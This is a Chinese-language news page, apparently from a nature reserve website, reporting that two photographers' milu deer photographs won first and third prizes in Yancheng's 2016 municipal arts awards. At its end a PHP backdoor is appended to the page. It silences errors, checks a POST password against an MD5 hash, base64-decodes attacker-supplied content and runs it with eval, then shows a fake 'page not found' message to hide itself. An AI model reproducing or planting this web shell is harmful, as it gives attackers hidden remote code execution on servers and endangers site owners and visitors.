最新要闻

首页 > 最新要闻 >

    杨国美、孙华金麋鹿摄影作品获2016年度盐城市政府文艺奖

           近日,盐城市人民政府办公室公布了2016年度盐城市政府文艺奖。其中,杨国美《中国麋鹿》系列作品(30)、孙华金《晨阳习舞》摄影作品分别获得一等奖和三等奖。
         《中国麋鹿》系列作品是杨老从他数以万计的作品中遴选出的几十幅,他被誉为“中国麋鹿摄影第一人”。麋鹿题材的独特感和新鲜感以及他善于运用光线、影调、色彩等营造出来绮丽雄浑的气势给人以强烈的视觉冲击。杨老的作品所表达的宗旨是将麋鹿文化融合到“人与自然和谐相处”这一“天人合一”的哲学与美学境界中来。他所拍摄的数以万计的麋鹿图像,为我国文化宝库增添了新的宝贵的形象资料,也通过这些影像让更多的人认识和了解珍稀物种麋鹿,进而提升大众保护麋鹿的意识。《晨阳习舞》是孙华金所拍摄的《湿地精灵 麋鹿传奇》摄影组照之一,他擅长用浓烈的色彩和光影表现麋鹿奔腾的状态、绿植和水体等。
           他们通过镜头记录下麋鹿的点滴,也记录了保护区的发展历程,这些图像也成为麋鹿、保护区、盐城乃至中国的名片!

     

     

     

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>